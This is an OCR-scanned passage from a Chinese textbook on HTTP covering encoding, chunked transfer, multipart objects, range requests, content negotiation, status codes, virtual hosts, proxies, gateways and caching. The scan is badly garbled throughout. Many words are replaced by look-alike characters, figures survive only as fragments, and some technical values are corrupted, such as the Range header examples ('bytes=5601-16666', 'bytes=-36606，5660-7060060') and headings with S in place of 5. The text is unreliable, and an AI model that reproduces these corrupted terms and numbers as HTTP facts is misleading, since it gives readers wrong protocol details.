部 字段 及 状态 码 稍 后 会 进行 阐述 。 





请 求 行 

包含 用 于 请 求 的 方法 ， 请 求 URI 和 HTTP 版本。 
状态 行 

包含 表明 响应 结果 的 状态 码 ， 原 因 短语 和 HTTP 版 本 。 
首部 字段 


包含 表示 请 求 和 响应 的 各 种 条 件 和 属性 的 各 类 首部 。 
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一 和 股 有 4 种 首部 ， 分 别 是 : 通用 衣 部 、 请 求 首部 、 啊 应 表 部 和 实体 衣 


部 。 

其 他 

可 能 包含 HTTP 的 RFC 里 未 定义 的 首部 〈Cookie 等 ) 。 

3.3 ”编码 提升 传输 速率 

HTTP 在 传输 数据 时 可 以 按照 数据 原貌 直接 传输 ， 但 也 可 以 在 传输 过 
程 中 通过 编码 提升 传输 速率 。 通 过 在 传输 时 编码 ， 能 有 效 地 处 理 大 量 
的 访问 请 求 。 但 是 ， 编 码 的 操作 需要 计算 机 来 完成 ， 因 此 会 消耗 更 多 
的 CPU 等 资源 。 

3.3.1 报 文 主体 和 实体 主体 的 差异 


。 报 文 (message) 





是 HTTP 通信 中 的 基本 单位 ， 由 8 位 组 字 节 流 (octet sequence， 
其 中 octet 为 8 个 比特 ) 组成， 通过 HTTP 通信 传输 。 


。 实体 (entity) 


作为 请 求 或 啊 应 的 有 效 载 葡 数据 (补充 项 ) 被 传输 ， 其 内 容 由 实 
体 首 部 和 实体 主体 组 成 。 


HTTP 报 文 的 主体 用 于 传输 请 求 或 啊 应 的 实体 主体 。 


通常 ， 报 文 主体 等 于 实体 主体 。 只 有 当 传 输 中 进行 编码 操作 时 ， 实 体 
主体 的 内 容 发 生变 化 ， 才 导致 它 和 报 文 主体 产生 差异 。 


报 文 和 实体 这 两 个 术语 在 之 后 会 经 常 出 现 ， 请 事先 理解 两 者 的 差异 。 
3.3.2 ”压缩 传输 的 内 容 编码 

回 待 发送 邮件 内 增加 附件 时 ， 为 了 使 邮件 容量 变 小 ， 我 们 会 先 用 ZIP 
压缩 文件 之 后 再 添加 附件 发 送 。HTTP 协议 中 有 一 种 被 称 为 内 容 编码 
的 功能 也 能 进行 类 似 的 操作 。 

内 容 编 码 指明 应 用 在 实体 内 容 上 的 编码 格式 ， 并 保持 实体 信息 原样 压 
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纵 。 内 容 编 码 后 的 实体 由 客户 端 接收 并 负 员 和 解码。 





把 实体 压缩 变 小 





后 发 送 | 





图 : 内 容 编码 
常用 的 内 容 编码 有 以 下 几 种 。 


。 gzip (GNU zip) 





。compress (UNIX 系统 的 标准 压缩 ) 

edeflate (zlib) 

。identity (不 进行 编码 ) 
3.3.3 分割 发 送 的 分 块 传输 编码 
在 HITP 通信 过 程 中 ， 请 求 的 编码 实体 资源 尚未 全 部 传输 完成 之 前 ， 
浏览 器 无 法 显示 请 求 页 面 。 在 传输 大 容量 数据 时 ， 通 过 把 数据 分 割 成 
多 块 ， 能 够 让 浏览 器 逐步 显示 页 面 。 


这 种 把 实体 主体 分 块 的 功能 称 为 分 块 传输 编码 (Chunked Transfer 
Coding) 。 
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太 
先 将 实体 主体 分 割 变 小 
\ 后 再 发 送 


_。。 分 密 物 称 为 
块 { chunk ) 





a 





图 : 分 块 传输 编码 
分 块 传输 编码 会 将 实体 主体 分 成 多 个 部 分 ( 块 )。 每 一 块 都 会 用 十 六 
进 制 来 标记 块 的 大 小 ， 而 实体 主体 的 最 后 一 块 会 使 用 “0(CR+LF)” 来 标 


le 


使 用 分 块 传输 编码 的 实体 主体 会 由 接收 的 客户 端 负 责 解码 ， 恢 复 到 编 
码 前 的 实体 主体 。 


HTTP/1.1 中 存在 一 种 称 为 传输 编码 〈Transfer Coding) 的 机 制 ， 它 可 
以 在 通信 时 按 某 种 编码 方式 传输 ， 但 只 定义 作用 于 分 块 传输 编码 中 。 


3.4 及 大 多 种 数据 的 多 部 分 对 象 集合 





MIME 多 部 分 对 象 集合 


发 送 邮 件 时 ， 我 们 可 以 在 邮件 里 写 入 文字 并 添加 多 份 附件 。 这 是 因为 
采用 了 MIME (Multipurpose Internet Mail Extensions， 多 用 途 因 特 网 邮 
件 扩展 ) 机制， 它 允 许 邮 件 处 理 文本 、 图 片 、 视 频 等 多 个 不 同类 型 的 
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数据 。 例 如 ， 图 片 等 二 进 制 数据 以 ASCII 码 字 符 串 编码 的 方式 指明 ， 
就 是 利用 MIME 来 描述 标记 数据 类 型 。 而 在 MIME 扩展 中 会 使 用 一 
0 
>» 后 。 


相应 地 ，HTTP 协议 中 也 采纳 了 多 部 分 对 象 集合 ， 发 送 的 一 份 报 文 主 
体内 可 含有 多 类 型 实体 。 通 常 是 在 图 片 或 文本 文件 等 上 传 时 使 用 。 


多 部 分 对 象 集合 包含 的 对 象 如 下 。 





。 multipart/form-data 
在 Web 表单 文件 上 传 时 使 用 。 
e multipart/byteranges 


状态 码 206 (Partial Content， 部 分 内 容 〉 啊 应 报 文 包 含 了 多 个 范 
围 的 内 容 时 使 用 。 


。 multipart/form-data 


Content-Type: multipart/form-data; boundary=AaB03x 


--AaB03x 
Content-Disposition: form-data; name="field1" 





Joe Blow 

--AaB03x 

Content-Disposition: form-data; name="pics"; filename="filel .txt" 
Content-Type: text/plain 


. (filel.txt 的 数据 ) . . . 
--AaB03x-- 





。 multipart/byteranges 





HTTP/1.1 206 Partial Content 
Date: Fri, 13 Jul 2012 02:45:26 GMT 








Last-Modified: Fri, 31 Aug 2007 02:02:20 GMT 
Content-Type: multipart/byteranges; boundary=THIS STRING SEPARATES 


--THIS STRING SEPARATES 
Content-Type: application/pdf 
Content-Range: bytes 500-999/8000 
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.. 《范围 指定 的 数据 ) . . . 
--THIS STRING SEPARATES 
Content-Type: application/pdf 
Content-Range: bytes 7000-7999/8000 











..〔 范 围 指定 的 数据 〉... 
--THIS STRING SEPARATES-- 











在 HTTP 报 文中 使 用 多 部 分 对 象 集合 时 ， 需 要 在 首部 字段 里 加 上 
Contentrtype。 有 关 这 个 首部 字段 ， 我 们 稍 后 讲解 。 


使 用 boundary 字符 串 来 划分 多 部 分 对 象 集合 指明 的 各 类 实体 。 在 
boundary 字符 串 指定 的 各 个 实体 的 起 始 行 之 前 插入 “--” 标 记 【〈 例 如 : - 
-AaB03x、--THIS STRING SEPARATES) ， 而 在 多 部 分 对 象 集合 对 
应 的 字符 串 的 最 后 插入 “--" 标 记 〔 例 如 : --AaB03x--、-- 

THIS STRING SEPARATES--) 作为 结束 。 


多 部 分 对 象 集合 的 每 个 部 分 类 型 中 ， 都 可 以 含有 首部 字段 。 另 外 ， 可 
以 在 某 个 部 分 中 构 套 使 用 多 部 分 对 象 集合 。 有 关 多 部 分 对 象 集合 更 详 
细 的 解释 ， 请 参考 RFC2046。 


3.5 ”获取 部 分 内 容 的 范围 请 求 


以 前 ， 用 户 不 能 使 用 现在 这 种 局 速 的 带宽 访问 互联 网 ， 当 时 ， 下 载 一 
个 矿 寸 稍 大 的 图 片 或 文件 就 已 经 很 吃力 了 。 如 果 下 载 过 程 中 遇 到 网 络 
中 断 的 情况 ， 那 就 必须 重头 开始 。 为 了 解决 上 述 问 题 ， 需 要 一 种 可 恢 
复 的 机 制 。 所 谓 恢复 是 指 能 从 之 前 下 载 中 断 处 恢复 下 载 。 


要 实现 该 功能 需要 指定 下 载 的 实体 犯 围 。 像 这 样 ， 指 定 范围 发 送 的 请 
求 叫 做 范围 请 求 (Range Request) 。 


对 一 份 10 000 字 节 大 小 的 资源 ， 如 果 使 用 范围 请 求 ， 可 以 只 请 求 
5001~10 000 字 节 内 的 资源 。 
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GET /tip.jpg HTTP/1.1 
Host: www.usagidesign.jp 
Range: bytes =5001-10000 






HTTP/1.1 206 Partial Content 
Date: Fri, 13 Jul 2012 04:39:17 GMT 


Content-Range: bytes S5001-10000/10000 
Content-Length: 5000 
Content-Type: image/jpeg 


执行 范围 请 求 时 ， 会 用 到 首部 字段 Range 来 指定 资源 的 byte 范围 。 
byte 范围 的 指定 形式 如 下 。 


。5001~10 000 字 节 


Range: bytes=5601-16666 


e。 从 S001 字 节 之 后 全 部 的 


Range: bytes=56601- 


。 从 一 开始 到 3000 字 节 和 5000~7000 字 节 的 多 重 范 围 


Range: bytes=-36606，5660-7060060 


针对 范围 请 求 ， 啊 应 会 返回 状态 码 为 206 Partial Content 的 响应 报 
文 。 另 外 ， 对 于 多 重 苑 围 的 范围 请 求 ， 啊 应 会 在 首部 字段 Content- 
Type 标明 multipart/byteranges 后 返回 啊 应 报 文 。 
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如 果 服 务 器 端 无 法 啊 应 范围 请 求 ， 则 会 返回 状态 码 200 OK 和 完整 的 
实体 内 容 。 


3.6 内容 协 商 返 回 最 合适 的 内 容 


同一 个 Web 网 站 有 可 能 存在 着 多 份 相同 内 容 的 页 面 。 比 如 英语 版 和 
中 文 版 的 Web 页 面 ， 它 们 内 容 上 虽 相 同 ， 但 使 用 的 语言 却 不 同 。 


当 浏 览 器 的 默认 语言 为 瑞 语 或 中 文 ， 访 问 相 同 URI 的 Web 页 面 时 ， 
则 会 显示 对 应 的 喘 语 版 或 中 文 版 的 Web 页 面 。 这 样 的 机 制 称 为 内 容 
协商 〈Content Negotiation) 。 





浏览 器 的 默认 语言 为 英语 
ey Google 
FS 
显示 英语 页 面 
浏览 器 的 默认 语言 为 中 文 | 
mm 
显示 中 文 页 面 


图 : 访问 http://www.google.com/ 

六 容 协商 机 制定 指 客户 端 和 服务 融 端 承 啊 应 的 资源 和 内容 进 行 区 水 ， 然 
后 提供 给 客户 端 最 为 适合 的 资源 。 内 容 协商 会 以 啊 应 资源 的 语言 、 子 
符 集 、 编 码 方式 等 作为 判断 的 基准 。 


包含 在 请 求 报 文 中 的 某 些 首部 字段 (如 下 ) 就 是 判断 的 基准 。 这 些 首 
部 字段 的 详细 说 明 请 参考 下 一 章 。 








e。 Accept 


e。 Accept-Charset 
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e。 Accept-Encoding 

e。 Accept-Language 

。 Content-Language 
内 容 协商 技术 有 以 下 3 种 类 型 。 
服务 器 驱动 协商 (Server-driven Negotiation ) 
由 服务 器 站 进行 内 容 协商 。 以 请 求 的 首部 字段 为 参考 ， 在 服务 口 端 自 
动 处 理 。 但 对 用 户 来 说 ， 以 浏览 右 发 送 的 信息 作为 判定 的 依据 ， 并 不 
一 定 能 锯 选 出 最 优 内 容 。 
客户 端 驱 动 协商 〈Agent-driven Negotiation ) 
由 客户 端 进 行内 容 协商 的 方式 。 用 户 从 浏览 器 显示 的 可 选项 列表 中 手 
动 选 择 。 还 可 以 利用 JavaScript 脚本 在 Web 页 面 上 自动 进行 上 述 选 
择 。 比 如 按 OS 的 类 型 或 浏览 器 类 型 ， 目 行 切换 成 PC 版 页 面 或 手机 
版 页 面 。 
透明 协商 (Transparent Negotiation ) 


是 服务 占 驱 动 和 客户 端 驱动 的 结合 体 ， 是 由 服务 絮 痢 和 客户 端 各 自 进 
行内 容 协 商 的 一 种 方法 。 
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第 4 章 返回 结果 的 HITP 状态 








HTTP 状态 码 负责 表示 客户 端 HTTP 请 求 的 返回 结果 、 标 记 服 务 器 端 
的 处 理 是 否 正常 、 通 知 出 现 的 错误 等 工作 。 让 我 们 通过 本 章 的 学 习 ， 
好 好 了 解 一 下 状态 码 的 工作 机 制 。 





4.1 状态 码 各 知人 从 服务 硕 端 返回 的 请 求 结 


状态 码 的 职责 是 当 客 户 端 向 服务 器 端 发 送 请 求 时 ， 描 述 返 回 的 请 求 结 
果 。 借 助 状态 码 ， 用 户 可 以 知道 服务 器 端 是 正常 处 理 了 请 求 ， 还 是 出 
现 了 错误 。 
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正常 : 状态 码 2XX 







进展 顺利 ! 





其 处 理 结 果 是 ? 





图 : 啊 应 的 状态 码 可 描述 请 求 的 处 理 结 
状态 码 如 200 OK， 以 3 位 数字 和 原因 短语 组 成 。 


人 一 位 指定 了 啊 应 类 别 ， 后 两 位 无 分 类 。 啊 应 类 别 有 以 下 5 
种 。 


表 4-1: 状态 码 的 类 别 





原因 短语 


1XX |Informational (信息 性 状态 码 ) 接收 的 请 求 正在 处 理 
a Suecess 成功 状 态 码 ) 











Redirection〈 重 定向 状态 码 ) 需要 进行 2 以 完成 请 求 





区 前 Client Error 〈 客 户 端 错误 状态 码 ) | 服务 器 无 法 处 理 请 5 
5XX | Server Error〈 服 务 器 错误 状态 码 ) | 服务 器 处 理 请 求 出 





























只 要 遵守 状态 人 码 类 别 的 定义 ， 即 使 改变 RFC2616 中 定义 的 状态 码 ， 
或 服务 器 端 目 行 创建 状态 码 都 没 问题 。 


仅 记 录 在 RFC2616 上 的 HTTP 状态 码 就 达 40 种 ， 若 再 加 上 

WebDAV (Web-based Distributed Authoring and Versioning， 基 于 万 维 网 

的 分 布 式 创作 和 版 本 控制 ) (RFC4918、5842) 和 附加 HTTP 状态 码 
(RFC6585) 等 扩展 ， 数 量 就 达 60 余 种 。 别 看 种 类 繁多 ， 实 际 上 经 

常 使 用 的 大 概 只 有 14 种 。 接 下 来 ， 我 们 就 介绍 一 下 这 些 具 有 代表 性 

的 14 个 状态 码 。 
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4.2 2XX 成 功 
2XX 的 啊 应 结果 表明 请 求 被 正常 处 理 了 。 


4.2.1 200 OK 


请 求 已 正常 处 理 
四 羡 SN 
是 。 Ed 


客户 端 若 请 求 正 常 处 理 则 返回 200 OK 服务 器 
表示 从 客户 端 发 来 的 请 求 在 服务 器 端 被 正 稍 处 理 了 。 


在 啊 应 报 文 内 ， 随 状态 码 一 起 返回 的 信息 会 因 方 法 的 不 同 而 发 生 改 
变 。 比 如 ， 使 用 GET 方法 时 ， 对 应 请 求 资 源 的 实体 会 作为 啊 应 返 
回 ， 而 使 用 HEAD 方法 时 ， 对 应 请 求 资 源 的 实体 首部 不 随 报 文 主体 
作为 啊 应 返回 《〈 即 在 啊 应 中 只 返回 首部 ， 不 会 返回 实体 的 主体 部 











4.2.2 204 No Content 








请 求 处 理 成 功 ! 
但 没有 资源 可 返回 





服务 器 
该 状态 码 代 表 服 务 器 接收 的 请 求 已 成 功 处 理 ， 但 在 返回 的 响应 报 文中 
不 含 实体 的 主体 部 分 。 另 外 ， 也 不 允许 返回 任何 实体 的 主体 。 比 如 ， 
当 从 浏览 器 发 出 请 求 处理 后 ， 返 回 204 响应 ， 那 么 浏览 器 显示 的 页 面 
不 发 生 更 新 。 

一 般 在 只 需要 从 客户 端 往 服务 器 发 送信 息 ， 而 对 客户 端 不 需要 发 送 新 
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言 恩 和 内容 的 情况 下 使 用 。 


4.2.3 206 Partial Content 






明白 !/ 是 对 资源 某 一 





该 状态 码 表示 客户 端 进行 了 范围 请 求 ， 而 服务 器 成 功 执行 了 这 部 分 的 
GET 请 求 。 响 应 报 文中 包含 由 Content-Range 指定 范围 的 实体 内 容 。 


4.3 3XX 重 定向 


3XX 啊 应 结果 表明 浏览 器 需要 执行 条 些 特殊 的 处 理 以 正确 处 理 请 


4.3.1 301 Moved Permanently 






资源 曲 URI 已 更 新。 你 也 更 


oh 讲 行 书签 
需要 进行 书签 新 下 你 曲 书 鉴 引 用 吧 ? 


引用 的 变更 


永久 性 重 定 同 。 该 状态 码 表示 请 求 的 资源 已 被 分 配 了 新 的 URI， 以 后 
应 使 用 资源 现在 所 指 的 URI。 也 就 是 说 ， 如 果 已 经 把 资源 对 应 的 URI 
保存 为 书签 了 ， 这 时 应 该 按 Location 首部 字段 提示 的 URI 重新 保存 。 


像 下 方 给 出 的 请 求 URI， 当 指定 资源 路 径 的 最 后 忘记 添加 斜 本 <“/”， 就 
会 产生 301 状态 码 。 








http://example.com/sample 
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4.3.2 302 Found 








资源 曲 URI 已 临时 定位 到 
其 他 位 置 3。 姑且 算 你 己 
经 知道 这 个 情况 了. 






临时 性 重 定 同 。 该 状态 码 表 示 请 求 的 资源 已 被 分 配 了 新 的 URI， 和 希望 
用 户 《“ 本 次 ) 能 使 用 新 的 URI 访问 。 


和 301 Moved Permanently 状态 码 相 似 ， 但 302 状态 码 代 表 的 资源 不 
是 被 永久 移动 ， 只 是 临时 性 质 的 。 换 名 话说， 已 移动 的 资源 对 应 的 
URI 将 来 还 有 可 能 发 生 改 变 。 比 如 ， 用 户 把 URI 保 存 成 书签 ， 但 不 会 
像 301 状态 码 出 现时 那样 去 更 新 书签 ， 而 是 仍旧 保留 返回 302 状态 码 
的 页 面 对 应 的 URI。 


4.3.3 303 See Other 









资源 的 URI 已 重新， 你 是 否 
能 临时 挥 新曲 URI 访问 ? 








该 状态 码 表示 由 于 请 求 对 应 的 资源 存在 着 男 一 个 URI， 应 使 用 GET 
方法 定向 获取 请 求 的 资源 。 

303 状态 码 和 302 Found 状态 码 有 着 相同 的 功能 ， 但 303 状态 码 明确 
表示 客户 端 应 当 采 用 GET 方法 获取 资源 ， 这 点 与 302 状态 码 有 区 
别 OD 
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比如 ， 当 使 用 POST 方法 访问 CGI 程序 ， 其 执行 后 的 处 理 结果 是 希望 
客户 端 能 以 GET 方法 重 定 疝 到 男 一 个 URI 上 去 时 ， 返 回 303 状态 
人 码 。 虽 然 302 Found 状态 码 也 可 以 实现 相同 的 功能 ， 但 这 里 使 用 303 
状态 码 是 最 理想 的 。1 


1 本 书 采 用 的 是 HITP/1.1， 而 许多 HTTP/1.1 版 以 前 的 浏览 器 不 能 正确 理解 303 状 
态 码 。 虽 然 RFC 1945 和 RFC 2068 规范 不 允许 客户 ar et 求 的 方 
法 ， 但 是 很 多 现存 的 浏览 器 将 302 啊 应 视 为 303 啊 应 ， 并 且 使 用 GET 方 式 访问 在 
Location 中 规定 的 URI， 而 无 视 原先 请 求 的 方法 。 所 以 作者 说 这 里 使 用 303 是 最 
理想 的 。 一 一 译 者 注 


当 301、302、303 响应 状态 码 返 回 时 ， 几 乎 所 有 的 浏览 器 都 会 把 

ee 
> 庆 。 

301、302 标准 是 禁止 将 POST 方法 改变 成 GET 方法 的 ， 但 实际 使 
用 时 大 家 都 会 这 么 做 。 











4.3.4 304 Not Modified 





缓存 服务 器 


该 状态 码 表 示 客 户 端 发 送 附 带 条 件 的 请 求 “ 时 ， 服 务 器 端 允 许 请 求 访 
问 资源 ， 但 未 满足 条 件 的 情况 。304 状态 码 返回 时 ， 不 包含 任何 响应 
别 中 ， 但 是 和 重 定向 没有 关 


2 附带 条 件 的 请 求 是 指 采 用 GET 方 法 的 请 求 报 文中 包含 -Match，If-Modified- 
Since，If-None-Match，If-Range，]If-Unmodified-Since 中 任 一 首部 。 








4.3.S 307 Temporary Redirect 
临时 重 定向 。 该 状态 码 与 302 Found 有 着 相同 的 含义 。 尽 管 302 标准 
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禁止 POST 变换 成 GET， 但 实际 使 用 时 大 家 并 不 遵守 。 


307 会 遵照 浏览 器 标准 ， 不 会 从 POST 变 成 GET。 但 是 ， 对 于 处 理 响 
应 时 的 行为 ， 每 种 浏览 器 有 可 能 出 现 不 同 的 情况 。 


4.4 4XX 客户 端 错误 
4XX 的 啊 应 结果 表明 客户 端 是 发 生 错误 的 原因 所 在 。 





4.4.1 400 Bad Request 






我 无 法 理解 这 个 请 
求 ， 是 不 是 错 3? 





该 状态 码 表 示 请 求 报 文中 存在 语法 错误 。 当 错误 发 生 时 ， 需 修改 请 求 
的 内 容 后 再 次 发 送 请 求 。 另 外 ， 浏 览 器 会 像 200 OK 一 样 对 符 该 状态 
仁 。 





4.4.2 401 Unauthorized 
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(BB) 发 送 请 求 
站 aa 


第 1 次 返回 401 


TY 
A 


本 页 面 需 认 证 
mm 


( 请 求 中 已 包含 Authorization 
credentials ) 








第 2 次 返回 401 


Authorization Required 

This server could not verify that you are authorized to 
access the document requested. Either you supplied the 
wrong credentials (e.g., bad password), or your browser 
doesn't understand how to supply the credentials required. 


该 状态 人 码 表示 发 送 的 请 求 需要 有 通过 HTTP 认证 (BASIC 认证 、 
DIGEST 认证 ) 的 认证 信息 。 男 外 车 之 前 已 进行 过 1 次 请 求 ， 则 表示 
用 户 认证 失败 。 


返回 含有 401 的 啊 应 必须 包含 一 个 适用 于 被 请 求 资源 的 WWW- 
Authenticate 首部 用 以 质询 (challenge) 用 户 信息 。 当 浏览 器 初次 接收 
到 401 响应 ， 会 弹出 认证 用 的 对 话 窗口 。 





4.4.3 403 Forbidden 





不 多 许 访问 那个 





客户 端 服务 器 


该 状态 码 表明 对 请 求 资源 的 访问 和 被 服务 器 拒绝 了 。 服 务 器 端 没有 必要 
给 出 拒绝 的 详细 理由 ， 但 如 果 想 作 说 明 的 话 ， 可 以 在 实体 的 主体 部 分 
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对 原因 进行 描述 ， 这 样 就 能 让 用 户 看 到 了 。 


未 获得 文件 系统 的 访问 授权 ， 访 问 权限 出 现 共 些 问题 《从 未 授权 的 发 
送 源 耻 地 址 试图 访问 ) 等 列举 的 情况 都 可 能 是 发 生 403 的 原因 。 


4.4.4 404 Not Found 






服务 器 上 没有 请 求 风 资源 


Not Found 





The requested URL /a was not found on this server. 


服务 器 


该 状态 码 表明 服务 嚣 上 无 法 找到 请 求 的 资源 。 除 此 之 外 ， 也 可 以 在 服 
务 器 端 拒绝 请 求 且 不 想 说 明理 由 时 使 用 。 


4.5 SXX 服务 器 错误 
5XX 的 啊 应 结果 表明 服务 器 本 身 发 生 错 误 。 


4.S.1 S00 Internal Server Error 





忽 似 ， 内 部 资源 出 


[9 .9 
客户 端 服务 器 


该 状态 码 表明 服务 器 端 在 执行 请 求 时 有 发生 了 错误 。 也 有 可 能 是 Web 
应 用 存在 的 bug 或 订 些 临时 的 故障 。 





4.5.2 S03 Service Unavailable 
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把 靳 ， 现 在 我 正 忙 着 
[2 | pa 


E P” \ : 


| 
a 





该 状态 码 表明 服务 器 暂时 处 于 超 负 载 或 正在 进行 集 机 维护 ， 现 在 无 法 
处 理 请 求 。 如 有 果 事 先 得 知 解除 以 上 状况 需要 的 时 间 ， 最 好 写 入 
RetryAfter 首部 字段 再 返回 给 客户 端 。 


状态 码 和 状况 的 不 一 致 





不 少 返 回 的 状态 码 响 应 都 是 错误 的 ， 但 是 用 户 可 能 察觉 不 到 这 点 。 
比如 Web 应 用 程序 内 部 发 生 错 误 ， 状 态 码 依然 返回 200 OK， 这 种 
情况 也 经 常 遇 到 。 
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第 S$ 章 与 HTTP 协作 的 Web 服 


务 俘 


一 台 Web 服务 器 可 搭建 多 个 独立 域名 的 Web 网 站 ， 也 可 作为 通信 路 
径 上 的 中 转 服 务 器 提升 传输 效率 。 





S.1 用 单 合 虚 拟 主机 实现 多 个 域名 


HTTP/1.1 规范 允许 一 台 HTTP 服务 器 搭建 多 个 Web 站 点 。 比 如 ， 提 
供 Web 托管 服务 (Web Hosting Service) 的 供应 商 ， 可 以 用 一 人 台 服 务 
器 为 多 位 客户 服务 ， 也 可 以 以 每 位 客户 持 有 的 域名 运行 各 目 不 同 的 网 
站 。 这 是 因为 利用 了 虚拟 主机 (Virtual Host， 又 称 虚 拟 服 务 器 ) 的 功 


后 忆 
月 上 。 


即使 物理 层面 只 有 一 台 服 务 器 ,但 只 要 使 用 虚拟 主机 的 功能 ， 则 可 以 
假想 已 具有 多 人 台 服 务 需 。 








09 








物理 层面 的 服务 器 虚拟 主机 


www.hackr.jp 


虚拟 主机 


xss.hackr.ip 


客户 端 使 用 HTTP 协议 访问 服务 器 时 ， 采用 类 似 www.hackr.jp 
这 样 的 主机 名 和 域名 。 


在 互联 网 上 ， 域 名 通过 DNS 服务 映射 到 卫 地 址 〈 域 名 解析 ) 之 后 访 
问 目标 网 站 。 可 见 ， 当 请 求 发 送 到 服务 器 时 ， 已 经 是 以 卫 地 址 形式 
访问 了。 


所 以 ， 如 果 一 台 服 务 器 内 托管 了 www.tricorderjp 和 www.hackrjp 这 
两 个 域名 ， 当 收 到 请 求 时 就 需要 弄 清楚 究竟 要 访问 哪个 域名 。 














若 www.tricorder.jp 和 www.hackr.jp 同 时 部 署 在 同一 个 服务 
器 上 { 相同 的 IP 地 址 ), 使 用 DNS 服务 解析 域名 后 , 两 者 的 访 
问 IP 地 址 会 相同 。 


在 相同 的 包 地 址 下 ， 由 于 虚拟 主机 可 以 寄存 多 个 不 同 主机 名 和 域名 
的 Web 网 站 ， 因 此 在 发 送 HTTP 请 求 时 ， 必 须 在 Host 首部 内 完整 指 
定 主机 名 或 域名 的 URI 

5.2 ”通信 数据 转发 程序 : 代理 、 网 关 、 隧 
道 


HTTP 通信 时 ， 除 客户 器 和 服务 器 以 外 ， 还 有 一 些 用 于 通信 数据 转发 
的 应 用 程序 ， 例 如 代理 、 网 关 和 隧道 。 它 们 可 以 配合 服务 器 工作 。 


这 些 应 用 程序 和 服务 器 可 以 将 请 求 转发 给 通信 线路 上 的 下 一 站 服务 
器 ， 并 且 能 接收 从 那 台 服 务 器 发 送 的 啊 应 再 转发 给 客户 端 。 

代理 

代理 是 一 种 有 转发 功能 的 应 用 程序 ， 它 扮演 了 位 于 服务 器 和 客户 
端 “ 中 间 人 ”的 角色 ， 接 收 由 客户 端 发 送 的 请 求 并 转发 给 服务 器 ， 同 时 
也 接收 服务 器 返回 的 啊 应 并 转发 给 客户 端 。 

网 关 

网 关 是 转发 其 他 服务 器 通信 数据 的 服务 右 ， 接 收 从 客户 端 发 送 来 的 请 
求 时 ， 它 惑 像 上 自己 拥有 资源 的 源 服 务 器 一 样 对 请 求 进行 处 理 。 有 时 客 
户 端 可 能 都 不 会 察觉 ， 目 己 的 通信 目标 是 一 个 网 关 。 

隧道 


隧道 是 在 相隔 其 远 的 客户 端 和 服务 器 两 者 之 间 进 行 中 转 ， 并 保持 双方 
通信 连接 的 应 用 程序 。 


S.2.1 ”代理 
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代理 服务 器 源 服务 器 


We em Be ee 











代理 服务 噩 的 基本 行为 就 是 接收 客 忆 站 发 送 的 请 求 后 转发 给 其 他 服务 
ee 


持 有 资源 实体 的 服务 器 被 称 为 源 服 务 器 。 从 源 服务 器 返回 的 啊 应 经 过 
代理 服务 器 后 再 传 给 客户 端 。 


"GET / HTTP/1.1) " GET/HTTP/1.1 ， 
1! Via: RO 1 !Via: 2 proxy1! 


1 








ps 1 200 OK ete/ 1 200 Ok, 
IVie: proxy2, proxy1' 此 Via: proxy2 _ /1 


-NNNe-- 





在 HTTP 通信 过 程 中 ， 可 级 联 多 台 代 理 服务 占 。 请 求 和 啊 应 的 转发 会 
经 过 数 合 类 似 锁链 一 样 连接 起 来 的 代理 服务 器 。 转 发 时 ， 需 要 附加 
Via 首部 字段 以 标记 出 经 过 的 主机 信息 。 
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2 


通过 设置 组 织 内 部 的 代理 服务 器 可 做 到 针对 特定 URI 访 问 的 控制 。 


使 用 代理 服务 器 的 理由 有 : 利用 缓存 技 术 《〈 稍 后 讲解 ) 减少 网 络 市 宽 
ee 
目 J， 等 等 。 


代理 有 多 种 使 用 方法 ， 按 两 种 基准 分 类 。 一 种 是 是 否 使 用 缓存 ， 男 一 


种 是 是 否 会 修改 报 文 。 
绥 存 代理 


代理 转发 响应 时 ， 缓 存 代 理 〈Caching Proxy) 会 预先 将 资源 的 副本 
(缓存 ) 保存 在 代理 服务 器 上 。 


当代 理 再 次 接收 到 对 相同 资源 的 请 求 时 ， 残 可 以 不 从 源 服务 器 那里 获 
取 资 源 ， 而 是 将 之 前 缓存 的 资源 作为 啊 应 返回 。 


透明 代理 
转发 请 求 或 啊 应 时 ， 不 对 报 文 做 任何 加 工 的 代理 类 型 被 称 为 透明 代理 
CTransparent Proxy) 。 反 之 ， 对 报 文 内 容 进行 加 工 的 代理 被 称 为 非 
透明 代理 。 


5.2.2 网关 





| N 
1 非 HTTP 协 议 通信 | 起 


二 > hf 





2 


HTTP 响应 


SS 


非 HTTP 服 务 器 
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图 : 利用 网 关 可 以 由 HTTP 请 求 转 化 为 其 他 协议 通信 


网 关 的 工作 机 制 和 代理 十 分 相似 。 而 网 关 能 使 通信 线路 上 的 服务 器 提 
供 非 HTTP 协议 服务 。 


利用 网 关 能 提高 通信 的 安全 性 ， 因 为 可 以 在 客户 端 与 网 关 之 间 的 通信 
线路 上 加 密 以 确保 连接 的 安全 。 比 如 ， 网 关 可 以 连接 数据 库 ， 使 用 
SQL 语句 查询 数据 。 另 外 ， 在 Web 购物 网 站 上 进行 信用 卡 结算 时 ， 

网 关 可 以 和 信用 卡 结算 系统 联动 。 

















5.2.3 ”隧道 


隧道 可 按 要 求 建立 起 一 条 与 其 他 服务 器 的 通信 线路 ， 届 时 使 用 SSL 等 
| 
通信 。 

隧道 本 身 不 会 去 解析 HTTP 请求。 也 就 是 说 ， 请 求 保持 原样 中 转 给 之 
后 的 服务 器 。 隧 道 会 在 通信 双方 断 开 连接 时 结束 。 


建立 安全 的 通信 线路 


OQ 
[DR 有 





mn 





图 : 通过 隧道 的 传输 ， 可 以 和 远 距 离 的 服务 器 安全 通信 。 隧 道 本 
喘 是 透明 的 ， 客 户 端 不 用 在 意 隧 道 的 存在 


5.3 ”保存 资源 的 缓存 


绥 存 是 指 代 理 服务 器 或 客户 端 本 地 磁盘 内 保存 的 资源 副本 。 利 用 绥 存 
可 减少 对 源 服务 器 的 访问 ， 因 此 也 就 节省 了 通信 流量 和 通信 时 间 。 


绥 存 服务 器 是 代理 服务 器 的 一 种 ， 并 归 类 在 缓存 代理 类 型 中 。 换 句 话 
源 的 副本 。 
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转发 响应 时 , 复制 资源 后 
保存 在 缓存 服务 器 上 


请 求 的 资源 如 果 已 经 被 缓存 则 直接 由 缓存 
服务 器 返回 给 客户 端 


AN 
[ GET/index.htm HTTP/1.1 ! 
WDD es 7 Ke ls 


会 向 源 服务 器 确认 
| index.htm | 缓存 资源 的 有 效 性 


绥 存 服务 器 的 优势 在 于 利用 缓存 可 避免 多 次 从 源 服务 器 转发 资源 。 因 
此 客户 端 可 就 近 从 缓存 服务 器 上 获取 资源 ， 而 源 服务 器 也 不 必 多 次 处 
理 相 同 的 请 求 了 。 


S.3.1 绥 存 的 有 效 期 限 


